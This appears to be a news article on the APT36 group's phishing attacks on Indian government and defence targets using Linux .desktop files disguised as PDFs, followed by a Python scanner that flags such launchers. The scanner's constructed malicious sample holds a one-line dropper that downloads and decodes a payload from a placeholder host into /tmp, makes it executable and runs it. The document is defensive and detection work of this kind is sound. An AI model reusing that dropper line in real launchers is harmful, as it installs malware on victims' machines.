APT36 hackers abuse Linux .desktop files to install malware

The Pakistan-linked APT36 cyberespionage group is using Linux .desktop files to load malware in new attacks against government and defense entities in India.

The activity, documented in reports by CYFIRMA and CloudSEK, aims at data exfiltration and persistent espionage access. APT36 has previously used .desktop files to load malware in targeted espionage operations in South Asia.

The attacks were first spotted on August 1, 2025, and based on the latest evidence, are still ongoing.

Desktop file abuse

Although the attacks described in the two reports use different infrastructure and samples (based on hashes), the tactics, techniques, and procedures (TTPs), attack chains, and apparent goals are the same.

Victims receive phishing emails carrying ZIP archives; each archive contains a malicious .desktop file that is disguised as a PDF document and named accordingly.

Linux .desktop files are text-based application launchers that contain configuration options dictating how the desktop environment should display and run an application.

Users open the .desktop file thinking it’s a PDF, which causes a bash command hidden in the ‘Exec=’ field to create a temporary file in ‘/tmp/’, fetch a hex-encoded payload from the attacker’s server or Google Drive, and write the decoded payload to that file.

Then, it runs ‘chmod +x’ to make it executable and launches it in the background.

To lower suspicion for the victim, the script also launches Firefox to display a benign decoy PDF file hosted on Google Drive.
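The traits described above (a launcher named like a document, an Exec= line that downloads and decodes a payload into /tmp, marks it executable, backgrounds it, and opens a decoy in the browser) are all visible in the plain text of the .desktop file, so they can be checked before a user double-clicks it. The following scanner is an added example written for this article, not code from CYFIRMA, CloudSEK, or the reports’ samples: it parses the [Desktop Entry] group and flags those traits. The two embedded sample entries are constructed for illustration and are not indicators from the reports; the hostname example.invalid and the Google Drive path are placeholders.

```python
"""Heuristic scanner for malicious-looking Linux .desktop launchers.

Added example for this article, not code from the CYFIRMA or CloudSEK reports.
It parses the [Desktop Entry] group of a .desktop file and flags the traits
described in the text: a Name styled as a document, and an Exec= line that
drops and runs a payload from /tmp, decodes it, or opens a remote decoy.
The sample entries at the bottom are constructed for illustration.
"""
import re
from pathlib import Path

# Each rule: (finding name, regex applied to the Exec= value).
EXEC_RULES = [
    ("shell_wrapper", re.compile(r"\b(bash|sh|zsh)\s+-c\b")),
    ("tmp_dropper",   re.compile(r"(/tmp/|/dev/shm/|\bmktemp\b)")),
    ("chmod_exec",    re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b")),
    ("downloader",    re.compile(r"\b(curl|wget)\b")),
    ("decoder",       re.compile(r"(\bxxd\s+-r|\bbase64\s+(-d|--decode)\b)")),
    ("remote_decoy",  re.compile(r"\b(firefox|xdg-open|chromium|google-chrome)\b[^;&|]*https?://")),
    ("backgrounded",  re.compile(r"(^|[^&])&(\s|$)")),  # a lone '&', not '&&'
]
DOC_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt)$", re.IGNORECASE)


def parse_desktop_entry(text: str) -> dict:
    """Return the key/value pairs of the [Desktop Entry] group as a dict.

    Keys are kept as written (including locale suffixes such as Name[en_GB]).
    Comments, blank lines, text before the first group header, and other
    groups such as [Desktop Action ...] are ignored.
    """
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")  # split on the first '=' only
            entry[key.strip()] = value.strip()
    return entry


def scan_desktop_entry(entry: dict) -> list:
    """Return the list of suspicious traits found in a parsed entry."""
    findings = []
    name, exec_line = entry.get("Name", ""), entry.get("Exec", "")
    # A launcher (Type=Application) whose Name is styled as a document.
    if entry.get("Type", "") == "Application" and DOC_EXT.search(name):
        findings.append("document_lookalike_name")
    for label, rule in EXEC_RULES:
        if rule.search(exec_line):
            findings.append(label)
    # Terminal=false keeps the dropper's output away from the victim's eyes.
    if exec_line and entry.get("Terminal", "false").lower() == "false" \
            and any(f in findings for f in ("tmp_dropper", "downloader")):
        findings.append("no_terminal")
    return findings


def scan_file(path) -> list:
    """Scan a .desktop file on disk (e.g. one extracted from a phishing ZIP)."""
    return scan_desktop_entry(parse_desktop_entry(Path(path).read_text(errors="replace")))


# Constructed samples (hypothetical, not real indicators from the reports).
MALICIOUS_SAMPLE = """[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "t=$(mktemp /tmp/XXXXXX); curl -s https://example.invalid/p.hex | xxd -r -p > $t; chmod +x $t; $t & firefox https://drive.google.com/file/d/EXAMPLE/view"
"""

BENIGN_SAMPLE = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=org.gnome.TextEditor
Terminal=false
"""

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_desktop_entry(parse_desktop_entry(sample)))
```

Run against the constructed malicious sample, the scanner reports every trait in the chain; the benign editor launcher produces no findings. Any single finding can occur in legitimate launchers (a browser shortcut triggers remote_decoy, for instance), so treat the output as a score to review rather than a verdict, and pay most attention to a document-like Name combined with tmp_dropper, decoder, or chmod_exec.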